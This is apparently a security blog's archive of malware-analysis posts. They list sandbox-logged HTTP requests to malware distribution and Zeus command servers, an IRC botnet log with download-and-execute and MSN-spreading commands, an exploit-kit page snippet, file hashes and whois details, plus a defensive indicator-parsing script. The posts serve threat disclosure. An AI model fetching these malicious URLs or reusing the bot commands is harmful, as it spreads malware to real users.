Tag Archives: Malicious Domains

Recent malicious URLs analyzed #3

Report containing malicious URLs logged:

POST /kj97hk9878b8j9hb.php?ini=XXX HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: simplycomics. in
 
POST /logos/XXX/61e3a327d/logo.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: greatwebdata. in
 
POST /werber/b10353d72/217.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: droolbuy. in
 
POST /perce/XXX/21c383b7c/qwerce.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: migented. in
 
POST /college_news/college_news/college_news/college_news/build.php HTTP/1.0
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /zeus/zeus/config.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /help.txt HTTP/1.1
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /images/Telegrama.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 80.13.172.136
 
GET /gx/444.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: toxtb. info
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /gx2/333.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ucfya. info
 
POST /zeus/zeus/server%5bphp%5d/gate.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.nxmtv. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1015000813 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: susimumezez. com
 
GET /v14/setup.php?act=fb_start&id=XXX HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: udjng. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hawfruit. com
 
GET /2wave.php?Yfe6r8E2QkJI0l5aLw0nFAqjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: hxxp://tubefaster. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mattfoy. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hslibrary. com
 
GET /2wave.php?Yfe6r8M2QkJI0l5aLwkkExXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://ad.adserverplus. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: utling. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: topsaj. com
 
GET /2wave.php?Yfe6r8U2QkJI0l5aLw0mEQKjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: http://trailersandvideos. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /in.cgi?groups HTTP/1.0
Referer: hxxp://sl.servednetworks. com/www/delivery/afr.php?zoneid=57&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m28m. in
 
GET /2wave.php?Yfe6r8k2QkJI0l5aLQwvHBXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://www.investopedia. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com

URLVoid domain analysis:


IRC Botnet Logs with MSN Spreader

We noticed the following details in a log file in our sandbox:

:m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr
:Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/
:Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177

These details relate to an IRC botnet, and we can extract a few commands from them:

1. Bots whose country (-c) is FRA, ESP or ITA join the channel “#it”:

.j -c FRA,ESP,ITA #it

2. Download and execute a remote file:

.dl http://efirst-data. in/install.48208.exe

3. Enable the MSN spreader module:

.mod msn on

4. Initialize the MSN spreader:

.msn.int

5. Set the MSN spreader URL:

.msn.set http://image4msn. com/
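To turn a sandbox log line like the one above into discrete commands and indicators, here is an added parser (example code, not from the original post). It assumes the IRC 332 reply carries the bot's instructions as the channel topic, that every token starting with "." opens a new command, and that URLs are defanged the way this page does it (a space after the dot), which it re-joins before extracting them:

```python
import re

# Constructed sample: the 332 (RPL_TOPIC) line quoted in the post, with the
# page's defanging (a space after the dot in hostnames) left in place.
SAMPLE_LINE = (
    ":Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it "
    ".dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # "
    ".msn.set http://image4msn. com/"
)

URL_RE = re.compile(r"https?://\S+")


def irc_topic_payload(line):
    """Return the trailing parameter (the channel topic) of an IRC 332 reply."""
    if not line.startswith(":"):
        raise ValueError("expected a server line with a ':prefix'")
    head, _, trailing = line[1:].partition(" :")
    parts = head.split()
    if len(parts) < 3 or parts[1] != "332":
        raise ValueError("not an RPL_TOPIC (332) reply")
    return trailing


def refang_tokens(tokens):
    """Re-join 'host. tld' pairs split by the page's defanging style (assumption).

    A token ending in '.' is glued to the following token unless that token
    itself starts a new bot command (i.e. begins with '.').
    """
    out, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        while tok.endswith(".") and i + 1 < len(tokens) and not tokens[i + 1].startswith("."):
            i += 1
            tok += tokens[i]
        out.append(tok)
        i += 1
    return out


def parse_bot_commands(topic):
    """Split a bot topic into (command, args) pairs; '.'-prefixed tokens open commands."""
    commands = []
    for tok in refang_tokens(topic.split()):
        if tok.startswith("."):
            commands.append((tok, []))
        elif commands:
            commands[-1][1].append(tok)
        else:
            raise ValueError(f"argument before any command: {tok!r}")
    return commands


def extract_indicators(commands):
    """Collect the URLs each command carries (here .dl and .msn.set) for blocklisting."""
    iocs = {}
    for cmd, args in commands:
        urls = [a for a in args if URL_RE.fullmatch(a)]
        if urls:
            iocs.setdefault(cmd, []).extend(urls)
    return iocs


if __name__ == "__main__":
    cmds = parse_bot_commands(irc_topic_payload(SAMPLE_LINE))
    for cmd, args in cmds:
        print(cmd, args)
    print(extract_indicators(cmds))
```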

The victim will now send the malicious URL to all of their MSN contacts:

http://image4msn. com/

This URL contains a Java exploit, as we can see from the page source:

<body><applet code='mordor.saruman.class' archive='./games/plugins.jar'><param name='sko' value=[...]

Report 2011-03-28 14:19:39 (GMT 1)
File Name: plugins-jar
File Size: 9015 bytes
File Type: Unknown file
MD5 Hash: 7b0418be80084558cf34f6bdc2d5b112
SHA1 Hash: 727d343bfd8f5bb970df10fed97eccb9562ac634
Detections: 0 / 9 (0 %)
Status: CLEAN

This is an image of the malicious URL when visited:

[image omitted]

An unprotected folder reveals the existence of other files (exploit kit):

[image omitted]

Network traffic:

GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
POST /objects/ocget.dll HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: activex.microsoft. com
 
GET /d.php?f=18&e=0 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com

An executable file (PE) is downloaded:

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 12:22:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Pragma: public
Expires: Mon, 28 Mar 2011 12:22:17 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 91280
Connection: close
Content-Type: application/x-msdownload

MZ

Recent malicious URLs analyzed #2

Report containing malicious URLs logged:

POST /msql.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: www.adamplus. com
 
GET /coldman.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lostyear. ru
 
GET /czl/zlo.cl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casualhopperois. com
 
POST /zumboo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lameedge. ru
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rapidshare. com
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rs851tl2.rapidshare. com
 
GET /exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.zdropp.co. cc
 
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
GET /install.48208.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: efirst-data. in
 
POST /djcash.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: talkwire. in
 
GET /download.php?token=4910b18a623c549e2e1bc53f6cc0682a4579fbf6 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 5630.zdropp.co. cc
 
POST /trackstats.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
POST /application.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
GET /download.php?bundle=1 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: s6199.wdropp.co. cc
 
GET /list.php?c=XXX&v=2&t=0,2486841 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru
 
GET /tm/crypt.exe?t=0,6011011 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: www.derquda. com
 
GET /sn.php?c=XXX&t=0,8542902 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru

URLVoid domain analysis:


Recent malicious URLs analyzed

Report containing malicious URLs logged:

GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
GET /exe/key/key4_0322.exe HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
POST /piastro.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: deltadataserve.in
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /zz7654/cfg.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /zlv.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
GET /maya.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
POST /zz7654/g765.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /e.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casinovergelijker.com
 
GET /wawxb/kllpcttkx.php?adv=adv477&id=XXX&c=XXX HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: abcartel.com
 
GET /emikavigat.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: xudezyj903.virtue.nu
 
GET /otasenaqynec.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: opytibuxi.virtue.nu
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: newpharmacyschools.ru
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: ql578.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /files/453734526/nig.exe HTTP/1.0
User-Agent: Mozilla
Host: rapidshare.com
 
GET /dw/dm.php?id=XXX&ver=dm0&v=2011_03_05&er=S_wd_rd_wrd_rrd_we_re_wc_rc_W5.1- HTTP/1.0
User-Agent: Mozilla/4.0 (SP3 WINLD)
Host: comcmdrun.com
 
GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: jeqtzjte.co.cc
 
GET /install.34556.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thepackplace.in
 
GET /dl.php?i=15 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 2367.in
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: releaseantivirus.com

URLVoid domain analysis:


Oficla Trojan spreads through keygens and software cracks

Here is a new list of dangerous domains, logged by internal honeypots and submitted by users, that are used to spread trojans, rogue security software and other malicious threats. Some of these domains still have a low detection rate as of today:

Rogue Security Software:


Trojan Distribution (Oficla/Renos):


Infected Websites:


The IP address 209.123.181.48 (AS8001 – NAC Net Access Corp) appears to have hosted, and to still host, a very high number of malicious domains, mostly used to distribute trojans disguised as keygens or cracks for popular commercial software:


Whois details for 209.123.181.48:

NetRange: 209.123.0.0 – 209.123.255.255
CIDR: 209.123.0.0/16
OriginAS: AS8001
NetName: NAC-NETBLK02
NetHandle: NET-209-123-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS2.NAC.NET
NameServer: NS1.NAC.NET
Comment: Additional Information Available via whois.nac.net
RegDate: 1997-08-06
Updated: 2007-09-18
Ref: http://whois.arin.net/rest/net/NET-209-123-0-0-1

OrgName: Net Access Corporation
OrgId: NAC
Address: 9 Wing Drive
City: Cedar Knolls
StateProv: NJ
PostalCode: 07927
Country: US
RegDate:
Updated: 2008-01-16
Ref: http://whois.arin.net/rest/org/NAC

OrgAbuseHandle: ABUSE156-ARIN
OrgAbuseName: Abuse Department
OrgAbusePhone: +1-800-638-6336
OrgAbuseEmail: XXXXX@nac.net
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE156-ARIN

The IP address 64.21.53.43 (AS8001 – NAC Net Access Corp) also appears to host malicious domains, in particular longsoft.org, which distributes trojans by promising keygens and cracks for software:

Trojan spreading in action:

[image omitted]

Report 2010-08-19 15:09:47 (GMT 1)
File Name: paragon.exe
File Size: 135168 bytes
File Type: Executable File (EXE)
MD5 Hash: f1d62efaea0986dd6b8ef1eee470e8dc
SHA1 Hash: 90f59e41ad56204390f58f34c61c4aea04538a31
Detections: 3 / 16 (19 %)
Status: INFECTED

Trojan Activity:

POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)

POST /logos/XXX
Host: devtempest.com (91.188.60.233)

POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)

POST /werber/34b520e6b47/217.gif HTTP/1.1
Host: mybubblebean.com (85.234.190.47)

POST /perce/XXX
Host: peribox.net (77.78.239.42)

64.21.53.43 (AS8001 – NAC Net Access Corp)


69.10.36.218 (AS19318 – NJIIX.net 110B Meadowlands Pkwy Secaucus)


178.63.3.138 (AS24940 – Hetzner Online AG RZ)


208.87.240.230 (AS40676 – Proxy registration for downstream)


217.23.5.74 (AS49981 – WorldStream)


8.14.147.235 (AS26481 – BONDWEB Bondweb)


69.55.50.102 (AS23393 – ISPRIME , Inc.)


We will stop here for now, but the list is very long!